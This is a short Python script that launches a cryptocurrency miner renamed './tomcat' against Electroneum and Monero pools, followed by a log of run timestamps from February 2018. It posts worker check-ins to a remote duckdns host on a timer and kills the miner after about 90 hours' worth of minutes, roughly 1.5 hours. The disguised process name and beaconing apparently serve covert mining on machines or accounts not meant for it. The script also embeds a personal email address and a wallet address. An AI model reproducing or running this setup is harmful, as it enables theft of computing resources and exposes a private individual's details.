import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:31:03.636248
#2018-02-17 16:16:06.388610
#2018-02-17 18:03:08.044677
#2018-02-17 19:50:07.449624
#2018-02-17 21:39:02.356316
#2018-02-17 23:23:01.250652
#2018-02-18 01:12:05.438165
#2018-02-18 02:59:01.535077
#2018-02-18 04:48:04.633679
#2018-02-18 06:38:05.876556
#2018-02-18 08:27:05.307141
#2018-02-18 10:15:05.544137
#2018-02-18 12:01:03.575883
#2018-02-18 13:46:05.785405
#2018-02-18 15:37:07.792482
#2018-02-18 17:26:06.141705
#2018-02-18 19:14:03.855542
#2018-02-18 21:00:04.776490
#2018-02-18 22:45:04.485504
#2018-02-19 00:34:02.900356
#2018-02-19 02:18:07.870695
#2018-02-19 04:06:05.616913
#2018-02-19 05:50:03.788023
#2018-02-19 07:40:04.813007
#2018-02-19 09:29:07.831909
#2018-02-19 11:18:06.196627
#2018-02-19 13:06:07.528437
#2018-02-19 14:54:07.371337
#2018-02-19 16:41:02.219948
#2018-02-19 18:28:06.787633
#2018-02-19 20:13:08.509835
#2018-02-19 22:04:06.241796
#2018-02-19 23:51:09.554032
#2018-02-20 01:38:07.741024
#2018-02-20 03:26:08.647957
#2018-02-20 05:15:10.261434
#2018-02-20 06:59:06.672074
#2018-02-20 08:46:01.508621
#2018-02-20 10:30:10.782678
#2018-02-20 12:14:08.264736
#2018-02-20 14:02:09.228659
#2018-02-20 15:45:13.472082
#2018-02-20 17:33:05.202703
#2018-02-20 19:21:08.273991
#2018-02-20 21:10:07.058607
#2018-02-20 22:55:09.193850
#2018-02-21 00:37:06.532113
#2018-02-21 02:23:06.291622
#2018-02-21 04:09:03.435211
#2018-02-21 05:56:04.267967
#2018-02-21 07:44:07.560181
#2018-02-21 09:31:01.417444
#2018-02-21 11:19:05.098903
#2018-02-21 13:07:04.970148
#2018-02-21 14:52:09.554287
#2018-02-21 16:39:11.977830
#2018-02-21 18:28:10.585276
#2018-02-21 20:15:08.822427
#2018-02-21 22:03:06.174747
#2018-02-21 23:51:06.077042
#2018-02-22 01:40:09.223058
#2018-02-22 03:28:07.050040
#2018-02-22 05:15:09.290742
#2018-02-22 06:59:07.666948
#2018-02-22 08:46:08.103949
#2018-02-22 10:36:05.028968
#2018-02-22 12:22:09.891693
#2018-02-22 14:08:07.748913
#2018-02-22 15:55:10.279241
#2018-02-22 17:41:07.969686
#2018-02-22 19:29:02.123562
#2018-02-22 21:21:06.775202
#2018-02-22 23:06:08.611494
#2018-02-23 00:54:04.301933
#2018-02-23 02:42:08.654003
#2018-02-23 04:30:09.489480
#2018-02-23 06:15:04.488589
#2018-02-23 08:01:07.685618
#2018-02-23 10:09:05.596758
#2018-02-23 12:01:07.137086
#2018-02-23 13:49:04.171482
#2018-02-23 15:37:01.668640
#2018-02-23 17:25:08.635671
#2018-02-23 19:10:07.951694
#2018-02-23 20:56:04.492926
#2018-02-23 22:41:05.152229
#2018-02-24 00:28:01.974648
#2018-02-24 02:18:07.985476
#2018-02-24 04:08:06.814442
#2018-02-24 05:56:05.030252
#2018-02-24 07:44:07.248079
#2018-02-24 09:30:09.223450
#2018-02-24 11:24:01.369029
#2018-02-24 13:13:04.892701
#2018-02-24 15:03:07.171465
#2018-02-24 16:53:04.937447
#2018-02-24 18:41:02.196602
#2018-02-24 20:32:03.823888
#2018-02-24 22:32:05.664875
#2018-02-25 01:40:08.424745
#2018-02-25 05:05:05.919347
#2018-02-25 10:09:01.509720